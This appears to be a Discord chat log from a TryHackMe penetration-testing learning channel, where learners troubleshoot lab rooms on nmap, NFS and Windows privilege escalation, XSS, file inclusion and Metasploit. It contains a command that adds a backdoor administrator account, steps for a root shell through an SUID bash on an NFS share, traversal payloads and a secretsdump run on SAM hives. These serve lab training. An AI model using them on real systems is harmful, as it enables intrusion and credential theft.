thank you, the problem is with sudo it asks me for my password before starting reminna, without sudo remmina asks me for the password, ill try the solution suggested by scrubz and let you know if it worked

Gave +1 Rep to @fair hill

thank you, ill let know if it works.

Hi! I was wondering if somebody can explain me how is technically possible the MAC Spoofing operation. Im explain, i am aware about how IP spoofing works, the content of the "source" field of the IP header of a (for example) TCP/IP packet has to be changed. What is the analogous process in the MAC Spoofing that Nmap do for us? Regards!

you change the mac address in the data link layer but keep the ip in the transport layer the same as your actual one

And what does this look like from the perspective of the TCP/IP packet? I mean, the same as in IP spoofing I change the "source" field, is there a source field from a MAC header or something?

Thanks for answering 🙂

yeah there is a source and destianation field in the data link layer for mac addresses

check out the new wireshark: the basics and wireshark: packet operations and you can look at some frames to see how network traffic looks in general

A lot of thanks, i will see that!! :):)

+rep @sage current

Gave +1 Rep to @sage current

wait wut why robert???

For the help up there that robocop didn't get you for

yeah... shadow likes them

and it shows on the top list too

surprisingly those credentials did not work with remmina, it was asking something like a keyring password for root

Oh yeah, that's a known issue. I'm not sure what the creds are, but clicking "cancel" makes the box go away, it'll just keep popping up. (Either that or use xfreerdp)

xfreerdp for the win

i forgot what i used but not remmina or xfreedp, i think i had downloaded something from the apt that i found as the 2nd suggestion from google. thanks for the help

Gave +1 Rep to @alpine barn

fair enough, I try to recommend the things that are pre-installed, as free users don't have internet access to easily install things on the attackbox 🙂 but if it worked it worked 🙂

i was on a rush that day and kinda flew over the task page that included xfreerdp details, after completing the room the next day when i went back to take notes then i found xfreerdp recommendation right there

That's what I did.

aaah, if that's the case that should be an easy fix

Hello everyone. Please, I have a problem when I type this command sshtryhackme@10.10.212.158 on the attack box I don't succee to connect to the 10.10.212.158

thank you, the room is root me

ok, thank you.

So how could I solve the problem please

thank you

Hi! Im was reading the part of the "fragmented packets" in Nmap Advanced Port Scan section and there is something that i don't understand:

• First, the path saids: the option -f to fragment packets [...] the IP data will be divided into 8 bytes or less. Adding another -f (-f -f or -ff) will split the data into 16 byte-fragments instead of 8.

• In the other hand, taking a look of the image provided by tryhackme we can see that the IP data field occupies 4 bytes.

Then, how it is possible that the -f flag fragment the IP data in 8 bytes or less if the mentioned field is already less than 8 bytes, 4 specifically? Im think there is something i missed but i still don't get it. It only get sense to me if the "IP data" term refers to all the data on the IP Header not only to the data field, is this right?

But i still reading and i found this: The data that we will fragment across multiple packets is highlighted in red, refering that the data is infact the part of the IP header that will be fragmented so i definitively don't get it.

Or maybe, the IP Data field is longer than 8 bytes (or even 16) but in the image this isn't clearly enough, but im still need a confirmation, thanks and regards!

Ok sorry, i already realized that my question is very stupid because it happens to be that the IP data is nothing else that the rest of the headers of the remaining layers from the OSI model, so of course this mentioned IP Data field can be greater than 8 bytes. Sorry, im kind of new on this, i try to do my best hehehe, regards.

Hey what is a Shrink Wrap code attack??

yep still going through the answers, somewhere they say something else and some other say some other thing so it's not clear

I knew you'd ask this

alright , I'll just keep looking around on google then. You're right

Ohhh really, glad I introduced it here then🙃

No it's not related to this path. but I am going through this path currently. I stumbled upon the term randomly, so thought of asking or searching on it but results aren't making much sense.

Quick question, I'm manually crawling a web page at the moment. I can't remember the file name that's kind of like robots.txt. THM mentioned this in the Jr pentester path in the same module, does anyone remember that file?

sitemap.xml????

It might be, I'll try it though and see

No luck on that one

???

I'm trying to exploit a directory vulnerability (with permission) and I've gotten only so far

No, it's from another site but has the same concepts

hackthissite.org

There are basic levels and im on the last one, basic 11

I don't want to look up a writeup

they have irc

dunno if they have a discord

Yeah... if im honest I don't trust social connections on that one lol

Well thanks guys, no worries. Just had that one question, I'll figure it out eventually

I found it!

Hi all, I completed this path today and I'm looking for advice on how best try and solidify what I've learnt. I feel like I have been given lots of bits of pieces but I'm not sure how well I could cobble it altogether solo at this point. Any recommendations on next steps / best ways to just practice, in order to get to grips with what I've been taught?

note taking note taking note taking

The note taking bit I'm fine with, it's the practice methods I need 😄

you could do the methodology room i guess
https://tryhackme.com/room/hackermethodology

Hello guys , i just wanna ask for smth about how to start in cyber secuirty especially ( pen testing path )

u wanna know where to start in THM or just in general?

In general !

if u are here already, u can start doing the path in Tryhackme website cuz it is a very good starting point and can guide u further

u can follow these path

These all paths in THM ?!

yes

Okay ty for the info

Hi. I asked for some help on this issue last week but received no help. So, I am asking again. On Privilege Escalation, Windows Privilege Escalation, Task 7, To change "Druva_inSync_exploit.txt", we need an administrator privilege. That privilege is the end goal of the task. Since I can't save the changes, I can't get the admin privilege to get the flag. HELP PLEASE!

Stuck for more than a week!!!

But the program looks in that location for it.

I thought the $cmd command looks in the same location for the file. But, it seems that we assign the changes in powershell ```
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"

thanks @steel nymph

Gave +1 Rep to @steel nymph

I'm having an issue on the final task of the XXS room. I'm supposed to insert the cookie stealer payload into a support ticket and then "wait up to a minute" for the request to come through. I've waited 5 minutes, reset the box and waited another 5 minutes, I've tried triggering the netcat request myself but obviously my own cookie is the wrong answer, I tried changing my cookie to admin true and no change. Any tips?

Are you using your own machine to catch the cookie or the attackbox?

It's my own kali VM

I can try the attackbox

Ye use the attackbox, it's somewhat a known issue that it is not working properly over the vpn

haha well I'm glad I asked! I would have kept racking my brain over this for hours. Thank you!

Can I just confirm that this is task 8 of https://tryhackme.com/room/xssgi ? I think i've seen @shadow echo comment about this elsewhere, but i'll put a note in the room that you may encounter difficulties using your own machine.

Yes sir that's correct! I was able to get it done successfully in the attack box but openvpn + personal machine was no bueno.

Brill, I'll put a note to make it clearer

Added: Note: You may encounter issues with receiving the request using your own VM and the VPN. It is recommended you use the AttackBox for this task.

sweet! Glad I could help in the future!

Damn right 😄

No idea why it works for me, but it does.

Hi everyone! I have a doubt and im wonder if anyone could help me to solve it.

In terms of a Windows machine specifically, if an application running in a process suddenly runs an executable, this will run in the same process that the application above or it runs in another process? And, if the response is the second, this other process is infact a subprocess of the first? Regards!

For example, if anyone doubts if this have something to be with the path. The SCM (Service Controler Manager) is a process that manage others process. Among other things, this process is responsible for run the executable asociated to a service to initiate it. So my question wouldbe if this service runs on the same process that SCM or in a subprocess.

well dunno exactly how windows does it.... but in linux every process is a subprocess of the init process which tends to be systemd nowadaysd

Ok thanks!

no problem

would bet on: https://tryhackme.com/room/btwindowsinternals having a good explaination of all the core processes on windows

Thanks! Sorry i can't response before

Of what path this rooms is part of?

that room??? it is not on any path as far as shadow knows

:(:(

Thanks! I didn't know that this even exists jejej!

yeah there are lots of good rooms that are on no paths

In the nmap room it says the following:

and then there's this example of an arp scan, but since it uses sudo, it means it defaults to ARP scan, doesn't it render the -PR flag unneccessary?

https://nmap.org/book/man-host-discovery.html "If no host discovery options are given, Nmap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. "

"The exceptions to this are the ARP (for IPv4) and Neighbor Discovery (for IPv6) scans which are used for any targets on a local ethernet network. " Just so I cover ARP scanning

Hi, Where should i start, when i want to be an ethical hacker? The path is the same as for penetration tester?

#start-here

Hi, I'm doing the linux privesc part now
I mounted the share with the no_root_squash, I put a shell script to create a shell, and gave it the SUID, but when I open it via the machine its not working?

I also tried another script to change bash's permissions on the machine

It is working with a binary file, I would like to know why is that

The suid bit does not apply to scripts.

Ok

anyone online care to help with metasploit msfvenom part ? my shell wont pop 😦

Please provide more information and someone will be able to help

i will start with starting over - and then i will ask in detail - i think i might have confused myself 😄 thnx anyways for now

i got the shell at last... good feeling doing it without help

nice work

anyone have a moment to help on linux priv esc, crontab section. No matter what I do I can't seem to catch the shell, think I'm missing something. I have followed the examples and walkthroughs online but still got nothin

tried on attack box and my kali vm with openvpn

wow nvm had to change permissions... these get you man lol

gj though 🙂

Ty ty

a new Red Teaming path has been added .

A channel for the path will be created in discord SoonTM

How long is it normally taking people to complete the linux and windows privilege escalation rooms? It is taking me forever to do them.

almost done with the learning path tho!

oh, some of those take ages

ok, glad its not just me lol

Is going through all learning paths a good idea before I start studying for the ejpt? Or do them in parallel ?

Hi, I am new to cyber security and pentester. I have no idea where to start and only has knowledge of few concepts. Where should I start?

#start-here have a look here @grizzled monolith 😁

Can I get some assistance with Windowsprivesc room, part of the JPT path?
At the very beginning of the "Abusing Dangerous privileges" section, it says to run whoami /priv to gather info on the privs available. Then it says to backup the SAM and System hashes. but, I get the following error:

It's like the user account is not getting assigned the intended privs when the box boots.

are you on the correct target machine???

there is a new one for task 6

yeah, i'm just returning to the module after a few weeks, so this happens after just launching the machine from task 6

and you logged in using these creds:

Log in to the target machine via RDP using the following credentials:

User: THMBackup

Password: CopyMaster555

Yes.

this is after relaunching the machine from task 6 again.

same output.

The task also says to use any of the 3 methods to get the flag... So, I can't imagine the user account wouldn't have those privs.

The user is also in the Backup Admins group, but it still doesn't allow me to backup the hive.

oh, wait a sec

i didn't run the cmd prompt as admin.

the privs are there after i run the cmd prompt as admin.

thanks @sage current

Gave +1 Rep to @sage current

no problem

sometimes it is the simpilest problems that require some thinking and rubber duck debugging

yes ma'am. it really do be that way sometimes lol. often overlook the simple things.

Hello! I am doing the hack the bank transferring the $2000 to account 8881. I have received the answer to be $767.68 as my account balance, yet it tells me the answer is wrong. Can someone explain?

The answer is not the balance amount, there should some text appear that holds the answer to the question

Hey all, I am doing web hacking fudamental room and stuck in Authentication Bypass Task 3. How do I make sure my valid_usernames.txt is in the same directory as the terminal? It seems like fuff can't locate the file. If anyone had the same trouble but was able to solve it, I'd appreciate your insight!

I mean, it doesn't have to be in the same directory, you can just provide the path to it, but if you want it to be in the same directory, just move it there ?

they are both in desktop. Doesn't it technically mean they are in the same directory?

Well if you current working directory for your terminal is Desktop and the file is also in Desktop, then yes

Hey is that normal that the address is now Machine_ip ?

It was something else 10min ago maybe its just got reboot and I need to wait

Machine_IP means your vm isn't deployed. I'd suggest you refresh the page, and deploy the VM in the room 🙂

Oooh mb I was using OpenVPN but I think I forgot to turn it on 😬

Is anyone still here?

yeah whats up

i'm having an issue

https://tryhackme.com/room/linprivesc
I'm in this room. No matter what I do, i cannot make my nfs file run on karen's machine. I've tried all three shares, different file mods +s, +x, +sx, 777. It just wont run.

so you have the nfs file on the karen machine

you have already done a chmod +x to make the file and executable

and it still wont run

?

i have had that exact scenario at least 3 times

will not run

can you do file whateverthenfsfileiscalled

and of course tell us the output

i just the vm so let me get it running again and i'll screenshot and tag you at every step.

also an alternative to making an nfs binary and compile that as code is to just straight use the bash binary from either the target machine or the attacking vm

i.e mount the nfs share
cp /bin/bash . in a terminal in the nfs share folder
chmod +s ./bash
chmod +x ./bash
and then finally run the file on the target machine

i made a video, but, i'm on the phone and there's dead time

do another ls -lah

have a feeling you messed it up by mounting the folder after making the binary

now even tho, i'm mounted to the share, it's not loading my files

says it's busy. guess i'll have call back later

./nonsense

wait a sec

was testing it from shadows attack machine to see if it worked

i think i may see the problem. my tun0 ip is not showing at top of the room

did it work

yeah you need to be connected to the vpn for it to work

and yes it did work with the bash executable for shadow

ok, i'll try again ... attempt no. 5

or 10 idr

order of operations

mount -o rw ip:/home/ubuntu/sharedfolder /blah/dir/blah
cd /blah/dir/blah
cp /bin/bash .
chmod +s ./bash

on target machine:
./bash -p

tada root shell

forgot a step with cd

so, i need to chmod after the file is in the file share?

yeah

you copy the bash executable into the share

then changes it perms in there

as those then reflect the perms on the nfs shared folder and therefor on the target machine

ok. i'm still getting a busy signal

weirds

also obviously replace the dir and ip in the above commands shadow posted

are you speaking of yourself in third person ... or?

yuups

can you run umount /blah/dir/blah and see if that works

Wassup, what problems are there

linux privesc room nfs section

getting it working and giving a root shell to sudo

Hmmm, give it half an hour and I am at my computer and I can help if you haven't gotten it yet

it wasn't meant for me to finish this room

eh just restart the target machine again

seems the nfs share thingy colapsed

does look like that rn.

I have been lurking

also this is shadow signing out

noooo

Ima video the whole process

Mount first, create file and compile later.
Also maybe don't have the directory you want to mount as you current working directory, so switch out of it to like /home and then mount

ok. will do. i've done that before, but i'm ready to end this. this task is killing me

that must have been the problem ...

@shadow echo Thanks. I thought I had done it that way before, but apparently not.

Gave +1 Rep to @shadow echo

Man, the file inclusion room is taking my head for a spin

Really not sure why

I've spent so much time on this room today and felt like I've gotten absolutely no where 😅
( I came back and figured out challenge 1 and 2, I had parts of it right just not the full thing )

So for challenge 3, I'm doing it all in ||inspect element and the page itself. I've changed GET to POST and when inputting ../../../../etc/flag3 or ....//....//....//....//etc/flag3 in to the file name section, it's not giving me the results I 'expect'. Am I missing something somewhere else? I've been bashing my head against this for an hr or two now and I feel like I'm going in circles||

Can you show how your post request looks?

How did you change request to post? Do you see some headers? Share screenshot of your headers

I changed method="POST" in the screenshot and input the filename into the field. That's how I did it for task 1 as well @rustic totem

Is there a better way?

Yeah, there are many. Do you know how to use burp?

No, I've just been doing this purely from inspect element

I considered it but wasn't too sure

Use burp or curl if you didnt get the flag

Sounds good. I figured doing it via inspect element would help me learn the best but its just frustrating at this point lol

Well that worked in curl. Still not sure why it didn't work in burp or web developer tools though doing the same thing

Ironically the RFI challenge was probably the easiest 😂

Did you add Content-Type header in post request?

Nope. Would that need to have gone on its own line in burp?

I should have probably just done the burp/curl rooms

Then come back to this

But I'm just stubborn

how do i run : inside a hydra error Http-post-data take three colon seprated argument and my login form error is "Error: Invalid user or pass " but if i paste that error it becames 4 colon argument and give me error

I'm having some trouble myself with this task.. first I got an error trying to execute nfs as per the instructions in "karen's" side because of "error in exec" which I believe is due to compiling from an attacking box with a different cpu architecture, so I decided to do it all over again following the steps in this video, and now I'me getting a completely different error, when trying to mount: "mount:/tmp/attacker: can't find in /etc/fstab"

any thoughts? I am running this from the attackbox now, so I'm root n'all..

Screenshot please

I suspect you're not telling it where to mount.

Remove the -v and -o

And give it the type of mount

Is it nfs?

yes - that worked

@idle bison thanks!

anyone looking for a study buddy? Pref GMT due to time but can work with others

Was this one but its's expire let met just restart it

I put 2395 as size since its the most occuring one but the two command have the same number of result

The terminal is way more clear ty

Will try in a few minutes

It worked ! There was no problem after all just a small terminal

Protocols and Servers: Hypertext Transfer Protocol room and I am pretty sure this is the way to get to the flag. Am I doing something wrong? Thank you in advance

You have to press enter 2 times, otherwise telnet is waiting for another potential header that you could provide.
Since there is nothing coming, the connection is getting closed

In Command Injection, Practical (Task 5), is the reasoning for ||adding an &/; at the start of the command because they continue running the full command / run the second part of the input as a separate command respectively (I'm not sure I worded this right), so it checks first for filters/inputs, then goes "oh I'm also going to run this as a part of that command"||

Where are you expecting to see it? I don't see you running ls anywhere

@native forge Don't ask the same question over multiple channels, it's spam.

hey, i have a question about the room wprivesc2_v1.1 Task 6 "Abusing dangerous privileges" Part "SeBackup / SeRestore": I got both the .hive files onto my system. but i cant get impackets secretsdump to run. it gives the following:

$ secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction failed: 'NoneType' object has no attribute 'getitem'
[*] Cleaning up...

I tried different versions of secretdump and also python. Is this intended behavior and i am just missing something?

ls where? the instructions don’t say that.

How do you expect to see the file if you aren't looking?

guys

short question

On the netsec challenge roam

there is this question

Browsing to http://.... displays a small challenge that will give you a flag once you solve it. What is the flag?

the answer is a nmap -sN null scan

basically the mission is to use the safest scan method to not get detected

is a scan where i shorten the package with -ff and use decoys more safe than a simple nmap null scan?

I’m not sure if this is the right place for this question or not but this is the room I’m currently in. I have been using the in-browser attack box and have completed pre-security path and part of jr penetration tester path. Tonight I decided to use the openvpn on my virtual machine. I connected to the openvpn and verified it through the provided website. But anytime I run a command in my terminal I get an error saying the file or directory doesn’t exist. I’m currently on authentication bypass task 2 and I’m not sure how to fix this. Any help is appreciated.

what doesn't exist?

user@tryhackme$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists" this is the command I run and the error is for /usr/share/wordlists/SecLists/Usernames/Names/names.txt I just copy and pasted the command from the page when I type it in I use the correct IP address.

can u cat /usr/share/wordlists/Seclists/Usernames/Names/names.txt

Hi guys ! In the Bypass authentication room, in the task 3 exactly , the brute force with ffuf is not working properly I got no result although i checked the syntax several times

Any help please

this is how it looks

I managed to pass the problem by making changes on the wordlist, i tested the usernames one by one (a single username in the wordlist)

Because when i have iterated them as a list it doesn’t work for me

Your username wordlist contains blank spaces?

Hi guys im right now doing

the metasploit module

and when i needed to exploit the smb port

the metasploit script returns

[*] Started reverse TCP handler on 10.10.17.117:4444 
[-] 10.10.191.91:445 - Exploit aborted due to failure: bad-config: 

Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.

Disable the DefangedMode option if you have authorization to proceed.

what does that mean

can u verify and show your payload and options?

!docs verify

So

can i renew my discord token

because i verified with my old discord acc which got deleted

i cant verify with the old token a new discord account

i accidentaly used the wrong ip

10.10.193.91

thats the attackbox ip

i used 10.10.191.91

ok that error message comes , if i use it on my personal ip too

Wrong ip for what?

well i wanted to exploit the smb port on the target system

i used the eternalblue module from metsploit

i had to set rhosts and lhosts

did you set rhost to eth0?

i accidentally set the rhost to 10.10.191.91 instead of 10.10.193.91

and then i got this weird error message

You can just exit msf and re-enter it

py 
[*] Started reverse TCP handler on 10.10.17.117:4444 
[-] 10.10.191.91:445 - Exploit aborted due to failure: bad-config: 

Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.

Disable the DefangedMode option if you have authorization to proceed.

now im afraid i did something illgeally

You wouldn't have.

but i think the exploit aborted anyways

if datastore['DefangedMode']
warning = <<~EOF
Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.
Disable the DefangedMode option if you have authorization to proceed.
EOF

  fail_with(Failure::BadConfig, warning)

thats the source code

  def fail_with(reason, msg = nil)
    raise Msf::Auxiliary::Failed, "#{reason.to_s}: #{msg}"
  end
```

it immeadiately throws an runtime exception

I'm available

After a 2 month break of anything computer related. Time to get back to it. Finishing up the nmap labs now

You a beginner?

i have SQLi question if anyone has a second 😓

ha sorry - guess its the canadian in me

yup fair enough; I ended up bugging a buddy about it. Trying to wrap my head around how SQL queries work and my eyes were starting to cross 😂

So in the SQL course I’ve encountered an error. The time based attack stopped working and just responded instantly in one millisecond for some reason.

Eventually I had to google answer

No it was ok. It was working fine at first but after a minute it broke and didn’t report anything.

Anyone able to explain to me the Authentication Bypass Task 4? I've completed the task I just dont 100% understand what is happening

Based on my understanding, it has do with how $_REQUEST prioritzes the data. The key statement is the following "If the same key name is used for both the query string and POST data, the application logic for this variable favours POST data fields rather than the query string, "

Given this, the exploit leverages this by making having the same key as part of the POST data fields. Note that the key originally exists as part of the query string.

The screenshot shows that the key exits as part of the GET and POST data fields. It's the key from the POST that is used; which consequently contains the attackers email. As such, the password reset is sent to the attacker's email

think i get it a little more, cheers for the help

No there is no blank spaces

darg, im on the Privilege Escalation: Sudo and it not taking the hashed password for the very last question

im even copy pasta-ing it

You have to crack the hash, then you can access user

Hello! Can any hacker tell me what goes on in your mind as you are pentesting? I'm trying to figure out the mindset

Hi @modest arch, welcome! Glad you are excited but please don't post the same question over multiple channels as it can be picked up as spam. TY and have fun here

Gave +1 Rep to @subtle wadi

robocop, grrr

my fault ty

no worries, thanks 🙂

Got it, thanks!

Gave +1 Rep to @rustic totem

Hello I'm right now at last module of jr pentester and in linux privilege room on task 11. I'm doing all the things as said in this task but I can't see my created files in mounted directory of target machine (basically i'm trying privesc using nfs). I've tried both my own attacker machine and tryhackme kali linux machine as attacking machine also i've tried using different directories which can be mounted for privesc but the files I create after mounting doesn't show up on the target machine's directory

Did you get this to work already?

No sir

Do you have some screenshots of what you have so far? I'm about to head out though. So I might not be able to look at it right away. There's usually people around though that could help also.

Finally finished the vulnerability capstone. Misread one word and couldn’t figure out why it wasn’t working lol

hi guys can anyone explaing to me how this work

C:\> move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe

like im moving a file to another file

?

i thought the second argument of move needs to be a director

directory

did but still dont understand it

https://www.geeksforgeeks.org/move-cmd-command/

MOVE [/Y | /-Y] [drive:][path]dirname1 dirname2 

it even says "dirname2"

how did it work with 2 files

nope you are not moving a file to another file. you are overwriting it. you are changing Disk.exe with rev-svc2.exe. So, your syntax is overwriting the file. You can move a file to a directory. Or a directory to a directory. With this command:
move source_path(the file that you want to move/it's path) destination_path(the directory that you want to move)

So on the above example

the content of rev-svc2.exe will get put in Disk.exe

?

but the final filename is Disk.exe?

yes that's true

oke thanks i really was confused

you're welcome hope it helped

ty mate it really did

What path is recommended after junior pentest? I haven’t done Pentest + yet

.

I’ll probably check out pentest + or the red teaming

Thank you. I was stuck on this and finally searched for help. lol

Gave +1 Rep to @idle bison

does anyone else have problems with starting up the browsre attack box

Free users don't have internet access.

im a paid user

Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


1 update can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Sep 26 14:47:16 2022 from 10.100.1.240
Could not chdir to home directory /home/karen: No such file or directory
$ 

this screen gets shown, when i try to open the browser attackbox

this looks like your target m/c, not the attackbox.

what do you mean with m/c?